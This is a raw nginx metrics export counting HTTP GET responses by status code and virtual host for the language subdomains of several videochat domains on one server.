nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.cafe"} 26709 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.date"} 39961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.mx"} 25403 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.show"} 20779 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.tv.br"} 38108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sv.videochat.world"} 48587 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.cafe"} 27076 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.date"} 41390 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.mx"} 25655 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.show"} 24641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.tv.br"} 39320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="sw.videochat.world"} 41135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.cafe"} 19263 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.date"} 30184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.mx"} 20824 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.show"} 23255 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.tv.br"} 130276 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.world"} 63987 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.cafe"} 33690 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.date"} 39218 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.mx"} 18366 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.show"} 19925 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.tv.br"} 61250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.world"} 73150 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="test.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.cafe"} 40517 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.date"} 43288 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.mx"} 15434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.show"} 18248 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.tv.br"} 51047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.world"} 75060 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.cafe"} 29599 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.date"} 30557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.mx"} 15128 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.show"} 19874 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.tv.br"} 55121 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.world"} 73922 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.cafe"} 34131 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.date"} 50767 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.mx"} 34588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.show"} 27136 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.tv.br"} 51904 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.world"} 59427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.cafe"} 40012 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.date"} 48097 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.mx"} 25542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.show"} 27667 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.tv.br"} 48961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.world"} 69447 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.cafe"} 32314 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.date"} 35360 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.mx"} 29107 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.show"} 23117 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.tv.br"} 49028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.world"} 57380 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.cafe"} 18323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.date"} 26275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.mx"} 20051 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.show"} 19947 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.tv.br"} 37943 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.world"} 43159 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.cafe"} 32798 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.date"} 33216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.mx"} 15378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.show"} 26977 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.tv.br"} 39469 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.world"} 46493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.cafe"} 30202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.date"} 42529 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.mx"} 29956 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.show"} 21500 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.tv.br"} 79298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.world"} 64519 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.cafe"} 20786 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.date"} 37695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.mx"} 19611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.show"} 18004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.tv.br"} 38570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.world"} 36075 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uzjrval.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.cafe"} 49149 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.date"} 45927 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.mx"} 24281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.show"} 36850 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.tv.br"} 57341 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.world"} 106313 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.cafe"} 217611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.date"} 153028 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.mx"} 273427 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.show"} 158393 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.tv.br"} 398215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.world"} 294878 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="wjftnkk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="wmiqjupdanpt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.cafe"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.date"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.mx"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.world"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.cafe"} 18070 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.date"} 40364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.mx"} 25791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.show"} 19996 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.tv.br"} 38236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.world"} 43142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xicipcrvyobs.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xzxksro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.cafe"} 23681 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.date"} 40378 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.mx"} 21133 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.show"} 19560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.tv.br"} 48581 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.world"} 63785 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.cafe"} 18734 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.date"} 40471 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.mx"} 19043 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.show"} 21231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.tv.br"} 39910 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.world"} 42503 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="hr.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="hr.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="it.videochat.date"} 69 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="it.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="mail.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="pt.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="vi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.mx"} 49 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.tv.br"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.world"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="1.0.0.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="1.1.1.1"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="127.0.0.1"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="127.0.0.1:80"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="161.97.120.25"} 13894 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="161.97.120.25:80"} 3268 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="84167165-jh888-17.tcr195p888.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aaexebs.videochat.mx"} 383 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aapfusu.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="acfqhxblqbkn.videochat.mx"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="admin.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.cafe"} 1010 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.date"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.mx"} 1657 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.show"} 308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.tv.br"} 846 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.world"} 2833 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aglxlmi.videochat.mx"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="agmeta.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.cafe"} 1522 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.date"} 451 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.mx"} 1662 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.show"} 468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.tv.br"} 1081 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.world"} 5711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.cafe"} 1029 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.date"} 614 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.mx"} 1196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.show"} 346 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.tv.br"} 1081 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.world"} 2777 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="amadorseniorcenter-oit.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="anasyet.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aotconsultinghoro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.cliproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.ip.pn"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.videochat.mx"} 25 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="app.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="appywko.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aqqrvsco.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.cafe"} 3766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.date"} 345 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.mx"} 2924 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.show"} 373 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.tv.br"} 1960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.world"} 3613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.cafe"} 1222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.date"} 194 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.mx"} 1646 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.show"} 443 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.tv.br"} 1003 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.world"} 3155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="azecuhi.videochat.mx"} 523 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.cafe"} 1374 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.date"} 270 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.mx"} 1593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.show"} 251 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.tv.br"} 1439 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.world"} 3618 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="backend.videochat.mx"} 3 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="backup.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bcfhjfa.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.cafe"} 1858 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.date"} 682 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.mx"} 1441 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.show"} 267 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.tv.br"} 991 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.world"} 2976 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bestproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bezhkht.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.cafe"} 1310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.date"} 2666 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.mx"} 1701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.show"} 203 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.tv.br"} 1089 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.world"} 3214 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="biydyro.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="blfxhsco.videochat.mx"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.cafe"} 1000 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.date"} 1295 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.mx"} 1371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.show"} 945 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.tv.br"} 1293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.world"} 5126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bnomnfi.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="brgffsco.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.cafe"} 1222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.date"} 347 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.mx"} 1898 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.show"} 793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.tv.br"} 663 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.world"} 2560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="budjjsu.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="buvvieo.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bvjywmk.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bwfzopl.videochat.mx"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.cafe"} 974 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.date"} 327 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.mx"} 1323 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.show"} 296 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.tv.br"} 950 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.world"} 3040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.cafe"} 907 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.date"} 1298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.mx"} 1645 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.show"} 521 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.tv.br"} 1135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.world"} 2993 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="celcsur.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chitseyfamilydenhttjessicalovesdeno.videochat.mx"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chk-68500.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.cafe"} 1464 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.date"} 488 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.mx"} 1297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.show"} 265 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.tv.br"} 914 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.world"} 2823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ckdbbet.videochat.mx"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ckupris.videochat.mx"} 11 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cloijsk.videochat.mx"} 590 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cpanel.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.cafe"} 1156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.date"} 2552 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.mx"} 1235 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.show"} 298 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.tv.br"} 923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.world"} 3124 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.cafe"} 1186 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.date"} 773 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.mx"} 1465 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.show"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.tv.br"} 1027 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.world"} 5416 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cytjruk.videochat.mx"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="czhdzka.videochat.mx"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="d483beb4-8cd8-4622-99df-d6910965ea9e.videochat.mx"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.cafe"} 1307 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.date"} 2762 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.mx"} 1223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.show"} 185 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.tv.br"} 2579 